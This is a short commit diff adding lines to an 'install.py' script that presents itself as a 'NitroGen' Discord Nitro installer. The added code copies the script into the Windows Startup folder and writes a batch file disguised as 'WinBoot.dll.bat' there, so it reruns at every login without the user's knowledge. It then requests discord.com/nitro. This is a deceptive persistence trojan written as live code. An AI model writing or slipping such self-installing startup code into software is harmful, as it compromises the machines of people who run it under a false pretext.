Update install.py

This commit is contained in:
heckeralt 2024-09-19 12:19:55 -04:00
parent 25b4b29cee
commit 61a385c738
1 changed files with 4 additions and 0 deletions

View File

@ -1,6 +1,10 @@
import os
import time
import requests
print("NitroGen")
print("----")
print("Installing")
time.sleep(1)
os.system("copy install.py %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup")
os.system("echo py install.py > %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinBoot.dll.bat")
x = requests.get('https://discord.com/nitro')